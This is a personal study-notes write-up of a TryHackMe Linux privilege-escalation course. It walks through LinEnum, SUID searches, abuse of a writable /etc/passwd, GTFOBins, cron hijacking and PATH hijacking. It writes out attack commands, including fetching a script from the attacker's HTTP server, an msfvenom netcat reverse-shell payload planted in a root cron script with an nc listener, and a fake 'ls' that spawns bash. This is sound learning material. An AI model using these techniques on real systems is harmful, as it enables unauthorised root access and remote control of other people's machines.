This is a continued series where I document my path through different tryhackme courses. I recommend everyone that wants to learn cyber security to subscribe to tryhackme.com and take the courses there.
Direction og Privilege Escalation
Two main privilege escalation variants.
- Horizontal privilege escalation
Expand your reach over the compromised system by taking over a different user who is on the same privilege level as you.
- Vertical privilege escalation
Attempt to gain higher privilege or access, with an existing account that you have already compromised.
LinEnum is a simple bash script that performs common commands related to privesc.
How to get LinEnum on the target machine?
Two methods, the first one which I prefer is to start a simple HTTP server on the attacking machine, with command
python3 -m http.server <any port>. Then wget on target machine with
http://ip:port/linenum.sh . After that make the script executable with
chmod +x filename.sh.
Second method is just to copy the raw LinEnum code and paste it in a new file on the target machine. Then make it executable.
Understanding LinEnum output
Kernel – Kernel information is shown here. Most likely a kernel exploit available for this machine.
Can we read/write sensitive files – These are files that any authenticated user can read and write to. We can see where there is misconfiguration that allows users who shouldn’t usually be able to, to be able to write to sensitive files.
SUID Files – SUID (Set owner user ID up on execution) is a special type of file permissions of whoever the owner is. If this is root, it runs with root permissions. It can allow us to escalate privileges.
Crontab Contents – Crontab file containing commands and instructions for the cron daemon to execute.
Abusing SUID/GUID Files
Finding and exploiting SUID Files
First step in Linux privesc is to check for files with SUID/GUID bit set. This measn that the file or files can run with the permissions of the file owner/group.
What is a SUID binary?
Demonstration of how maximum privileges look (rwx-rwx-rwx):
r = read
w = write
x = execute
user group others
rwx rwx rwx
421 421 421
The maximum number of bit that can be used to set permissions for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set permissions using
chmod as 755, then it will be: rwxr-xr-x.
But when special permissions are given to each user it becomes SUID or SGID. When extra bit “4” is set to user (Owner) it becomes SUID (Set user ID) and when “2” is set to group it becomes SGID (Set Group ID).
The permissions to look for when looking for SUID is:
Finding SUID Binaries
find / -perm -u=s -type f 2>/dev/null
This command searches the file system for SUID/GUID files.
find –initiated find command
/ – searches the whole system
-perm – searches for files with specific permissions
-u=s – any of the permissions bits mode are set for the file. Symbolic mode are accepted In this form
-type f – only search for files
2>/dev/null – Suppresses error
Exploiting Wriitable /etc/passwd
/etc/passwd file stores essential information, which is required to login. (User account information). /etc/passwd is a plain text file. It contains a list of the systems accounts, giving for each account some useful information like user ID, group ID, home directory, shell and more.
/etc/passwd should have general read permissions as many command utilities use it to map user IDs to user names. Write access to the /etc/passwd must only limit for the superuser/root account. If you have write permissions it can allow you to create a root user that you can access.
Understanding /etc/passwd format
/etc/passwd file contains one entry per line for each user (user account) of the system. All field are separated by a colon : symbol. Seven fields.
(as divided by colon (:))
- Username: Used when user logs in. Should be between 1 and 32 character in length
- Password: x characted indicates that encrypted password is stored in /etc/shadow file. Note that you need to use the passwd command to compute the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file. In this case the password hash is stored as an “x”.
- User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. UID 100-999 are reserved by system for administrative and system accounts/group.
- Groupd ID (GID): Primary groupd ID (stored in /etc/group file)
- User ID info: The comment field. Allows you to add extra information about the user.
- Home Directory: Absolute path to the directory the user will be in when they log in. If this dir doesn’t exist then users directory becomes /
- Command/shell: Absolute path of a command or shell (/bin/bash). Note that it does not have to be a shell.
How to exploit a writeable /etc/passwd
If we have writeable /etc/passwd file, we can write a new line entry according to the above formula and create a new user. We add the password hash of our choice and set the UID, GID and shell to root.
Escaping Vi Editor
You should always try this command when in a CTF scenario. This command lists what you’re able to use as a super user on that account. You will sometimes find that you are able to run certain commands a root user without the root password. This can enable PrivEsc.
Misconfigured Binaries and GTFOBins
If you find a misconfigured binary during your enumeration, or when you check what binaries a user account you have access to can access, you should look up how to exploit them in GTFOBins.
GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.
What is Cron?
Cron daemon is a long-running process that executes commands at specific dates and times. You can use this to schedule activities, either as one-time event or as recurring tasks.
How to view what cronjobs are active
We can use the command
cat /etc/crontab to view cron jobs that are scheduled.
Format of a cronjob
Cronjobs exists in a certain format. Lets break down the format:
# = ID
m = Minutes
h = Hour
dom = day of the month
mon = Month
dow = Day of the week
user = What user the command will run as
command = What command should be run
# m h dom mon dow user command
17 * 1 * * * root cd / && run-parts –report /etc/cron.hourly
How can we exploit this?
Lets that that a file names autoscript.sh is scheduled to run every five minute. Its owned by root, meaning that it will run with root privileges, despite the fact that we can write to this file. The task is then to create a command that will return a shell and paste it in this file. When the file runs again in five minutes the shell will be running as root.
- Create a payload using
msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
- Echo the msfvenom output to the script
- After copying the code into the script, wait for the cron to execute the file. Start a netcat listener using
nc -lvnp 8888and wait for the shell.
Exploitning PATH Variable
What is PATH?
PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by user.
To view Path of relevant user, use command
How to escalate privielges?
Lets say we have an SUID binary. Running it, we can see that its calling the system shell to do a basic process like list process with “ps”. To exploit it, we can re-write the PATH variable to a location of our choosing. So when the SUID binary calls the system shell to run an executable, it runs one that we’ve written instead.
As with SUID file, it will run this command with the same privileges as the owner of the SUID file. If this is root, using this method we can run whatever commands we like as root.
- The script runs the ls-command. To imitate the command, change dir to tmp.
- In the tmp we create a imitation executable. Format is echo “whatever command” > name of the executable.
echo “/bin/bash” > ls
- Make it executable.
chmod +x ls
- Change the PATH variable, so that it points to the dir where our imitation ls is stored.
- This will cause you to open a bash prompt every time you use
ls. To use the “real” ls, use
- To reset, use export